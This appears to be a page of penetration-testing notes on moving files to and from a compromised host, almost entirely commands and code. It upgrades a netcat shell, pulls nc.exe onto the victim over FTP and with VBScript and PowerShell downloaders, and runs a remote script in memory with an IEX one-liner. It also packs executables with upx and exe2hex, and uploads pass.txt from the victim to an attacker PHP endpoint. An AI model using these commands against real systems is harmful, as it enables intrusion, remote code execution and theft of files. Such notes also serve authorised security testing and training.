File Transfer

Linux File Transfer

Netcat - From Non-Interactive to Interactive Shell

# Run the following commands after getting a non-interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'

# Fix Arrows Issue
CTRL + Z
stty raw -echo 
fg

Windows File Transfer

FTP

# Install and configure FTP server
sudo apt update && sudo apt install pure-ftpd
# Follow the provided FTP configurations script

# Create ftp.txt file for FTP commands
echo open 192.168.1.8> ftp.txt
echo USER limbo> ftp.txt
echo limbo> ftp.txt
echo bin> ftp.txt
echo GET nc.exe> ftp.txt
echo bye> ftp.txt

# Transfer file using FTP
ftp -v -n -s:ftp.txt

# Fixing timeout problem
echo "40110 40210" | sudo tee /etc/pure-ftpd/conf/PassivePortRange
sudo service pure-ftpd restart

VBScript to Download Files

# Save the following content into wget.vbs
# Run using: cscript wget.vbs http://192.168.1.8/evil.txt evil.txt
strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts
Err.Clear
Set http = Nothing
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
http.Open "GET",strURL,False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(StrFile,True)
strData = ""
strBuffer = ""
For lngCounter = 0 to UBound(varByteArray)
    ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1)))
Next
ts.Close

PowerShell Commands to Download Files

# Save the following content into wget.ps1
# Run using: powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
$webclient = New-Object System.Net.WebClient
$url = "http://192.168.1.8/evil2.txt"
$file = "evil2.txt"
$webclient.DownloadFile($url,$file)
# PowerShell in one line
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.8/evil2.txt', 'evil2-2.txt')
# On-the-fly command (Run PowerShell script without downloading it on the hard disk)
powershell IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.8/hello.ps1')

Compressing and Encoding Executable

# Compress and encode nc.exe
upx -9 nc.exe

# Convert executable to hexadecimal format
exe2hex nc.exe -p nc.cmd

# Copy and paste the content of nc.cmd into the shell

File Upload from Victim to Attacker

# Save the following PHP code into /var/www/html/upload.php
# Use the code to upload a file (e.g., pass.txt) from the victim to the attacker
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>
# Upload a file (e.g., pass.txt) using PowerShell
powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.1.8/upload.php', 'pass.txt')
PreviousPost ExploitationNextMaintaining Access

Last updated